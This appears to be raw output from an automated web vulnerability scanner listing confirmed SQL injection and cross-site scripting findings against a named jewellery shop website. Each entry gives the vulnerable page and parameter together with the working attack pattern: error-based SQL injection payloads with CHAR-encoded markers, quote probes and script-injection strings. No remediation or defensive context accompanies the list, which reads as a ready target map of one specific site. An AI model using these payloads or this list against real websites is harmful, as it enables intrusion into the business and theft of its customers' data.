- ||| SQL Injection
- Severity : Critical
- Confirmation : Confirmed
- Vulnerable URL : http://zebaishjewellers.com/productdetail.php?id=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))&category=43
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- ||| [High Possibility] SQL Injection
- Severity : Critical
- Confirmation : Confirmed
- Vulnerable URL : http://zebaishjewellers.com/productdetail.php?id=%27
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity : Critical
- Confirmation : Confirmed
- Vulnerable URL : http://zebaishjewellers.com/productdetail.php?id=NSFTW
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: NSFTW
- Severity : Critical
- Confirmation : Confirmed
- Vulnerable URL : http://zebaishjewellers.com/newarival.php?page=%27
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: page
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity : Critical
- Confirmation : Confirmed
- Vulnerable URL : http://zebaishjewellers.com/Featured.php?page=%27
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: page
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity : Critical
- Confirmation : Confirmed
- Vulnerable URL : http://zebaishjewellers.com/products.php?page=%27
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: page
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity : Critical
- Confirmation : Confirmed
- Vulnerable URL : http://zebaishjewellers.com/productdetail.php?id=%27&category=43
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity : Critical
- Confirmation : Confirmed
- Vulnerable URL : http://zebaishjewellers.com/shoppingcart.php
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: color
- Parameter Type: Post
- Attack Pattern: (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns)
- Severity : Critical
- Confirmation : Confirmed
- Vulnerable URL : http://zebaishjewellers.com/shoppingcart.php
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: productid
- Parameter Type: Post
- Attack Pattern: %27
- Severity : Critical
- Confirmation : Confirmed
- Vulnerable URL : http://zebaishjewellers.com/shoppingcart.php
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: qty
- Parameter Type: Post
- Attack Pattern: %27
- Severity : Critical
- Confirmation : Confirmed
- Vulnerable URL : http://zebaishjewellers.com/shoppingcart.php
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: size
- Parameter Type: Post
- Attack Pattern: %27
- Severity : Critical
- Confirmation : Confirmed
- Vulnerable URL : http://zebaishjewellers.com/shoppingcart.php?save=%27
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: save
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity : Critical
- Confirmation : Confirmed
- Vulnerable URL : http://zebaishjewellers.com/shoppingcart.php?del=%27&id=2310
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: del
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity : Critical
- Confirmation : Confirmed
- Vulnerable URL : http://zebaishjewellers.com/shoppingcart.php?cancel=%27
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: cancel
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity : Critical
- Confirmation : Confirmed
- Vulnerable URL : http://zebaishjewellers.com/shoppingcart.php?save=convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: save
- Parameter Type: Querystring
- Attack Pattern: convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))
- Severity : Critical
- Confirmation : Confirmed
- Vulnerable URL : http://zebaishjewellers.com/shoppingcart.php
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
- Severity : Critical
- Confirmation : Confirmed
- Vulnerable URL : http://zebaishjewellers.com/shoppingcart.php
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: id
- Parameter Type: Post
- Attack Pattern: %27
- ||| XSS (Cross-site Scripting)
- Severity : Important
- Confirmation : Confirmed
- Vulnerable URL : http://zebaishjewellers.com/productdetail.php?id='"--></style></script><script>alert(0x0000E2)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x0000E2)</script>
- Severity : Important
- Confirmation : Confirmed
- Vulnerable URL : http://zebaishjewellers.com/productdetail.php?id='"--></style></script><script>alert(0x000150)</script>&category=43
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x000150)</script>
- Severity : Important
- Confirmation : Confirmed
- Vulnerable URL : http://zebaishjewellers.com/shoppingcart.php
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: qty
- Parameter Type: Post
- Attack Pattern: '" ns=alert(0x0002D5)
- ||| [Possible] Permanent Cross-site Scripting
- Severity : Important
- Confirmation : Confirmed
- Vulnerable URL : http://zebaishjewellers.com/shoppingcart.php
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Injection URL: http://zebaishjewellers.com/shoppingcart.php
- Parameter Name: qty
- Parameter Type: Post
- Attack Pattern: '+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'